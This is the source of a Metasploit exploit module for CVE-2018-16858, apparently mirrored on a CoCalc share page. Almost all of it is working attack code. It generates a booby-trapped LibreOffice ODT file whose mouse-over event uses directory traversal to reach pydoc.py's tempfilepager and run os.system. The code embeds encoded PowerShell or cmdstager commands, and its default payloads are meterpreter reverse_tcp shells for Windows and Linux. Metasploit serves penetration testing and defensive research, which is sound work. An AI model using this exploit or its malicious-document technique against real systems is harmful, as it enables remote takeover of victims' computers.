Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
29951 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Powershell

11
  include Msf::Exploit::CmdStager

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'LibreOffice Macro Code Execution',

18
        'Description' => %q{

19
          LibreOffice comes bundled with sample macros written in Python and

20
          allows the ability to bind program events to them. A macro can be tied

21
          to a program event by including the script that contains the macro and

22
          the function name to be executed. Additionally, a directory traversal

23
          vulnerability exists in the component that references the Python script

24
          to be executed. This allows a program event to execute functions from Python

25
          scripts relative to the path of the samples macros folder. The pydoc.py script

26
          included with LibreOffice contains the tempfilepager function that passes

27
          arguments to os.system, allowing RCE.

28


29
          This module generates an ODT file with a mouse over event that

30
          when triggered, will execute arbitrary code.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'Alex Inführ', # Vulnerability discovery and PoC

35
          'Shelby Pace' # Metasploit Module

36
        ],

37
        'References' => [

38
          [ 'CVE', '2018-16858' ],

39
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]

40
        ],

41
        'Targets' => [

42
          [

43
            'Windows',

44
            {

45
              'Platform' => 'win',

46
              'Arch' => [ ARCH_X86, ARCH_X64 ],

47
              'Payload' => 'windows/meterpreter/reverse_tcp',

48
              'DefaultOptions' => { 'PrependMigrate' => true }

49
            }

50
          ],

51
          [

52
            'Linux',

53
            {

54
              'Platform' => 'linux',

55
              'Arch' => [ ARCH_X86, ARCH_X64 ],

56
              'Payload' => 'linux/x86/meterpreter/reverse_tcp',

57
              'DefaultOptions' => { 'PrependFork' => true },

58
              'CmdStagerFlavor' => 'printf'

59
            }

60
          ]

61
        ],

62
        'DisclosureDate' => '2018-10-18',

63
        'DefaultTarget' => 0,

64
        'Notes' => {

65
          'Reliability' => UNKNOWN_RELIABILITY,

66
          'Stability' => UNKNOWN_STABILITY,

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        }

69
      )

70
    )

71


72
    register_options(

73
      [

74
        OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])

75
      ]

76
    )

77
  end

78


79
  def gen_windows_cmd

80
    opts =

81
      {

82
        remove_comspec: true,

83
        method: 'reflection',

84
        encode_final_payload: true

85
      }

86
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)

87
    @cmd << ' &amp;&amp; echo'

88
  end

89


90
  def gen_linux_cmd

91
    @cmd = generate_cmdstager.first

92
    @cmd << ' &amp;&amp; echo'

93
  end

94


95
  def gen_file(path)

96
    text_content = Rex::Text.rand_text_alpha(10..15)

97


98
    # file from Alex Inführ's PoC post referenced above

99
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))

100
    libre_file = ERB.new(fodt_file).result(binding)

101
    libre_file

102
  rescue Errno::ENOENT

103
    fail_with(Failure::NotFound, 'Cannot find template file')

104
  end

105


106
  def exploit

107
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'

108
    if datastore['TARGET'] == 0

109
      gen_windows_cmd

110
    elsif datastore['TARGET'] == 1

111
      gen_linux_cmd

112
    else

113
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')

114
    end

115
    fodt_file = gen_file(path)

116


117
    file_create(fodt_file)

118
  end

119
end

120


121